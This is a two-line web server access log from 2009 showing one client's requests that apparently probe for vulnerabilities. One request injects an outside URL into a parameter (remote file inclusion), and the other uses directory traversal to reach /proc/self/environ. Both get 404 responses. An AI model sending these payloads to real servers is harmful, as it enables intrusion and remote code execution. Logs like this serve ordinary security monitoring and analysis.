85.153.6.44 - - [17/Jul/2009:03:54:59 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
85.153.6.44 - - [17/Jul/2009:03:55:00 -0400] "GET /logs/access_log.Q109070300/vwar/includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 290 "-" "XXXXXX"
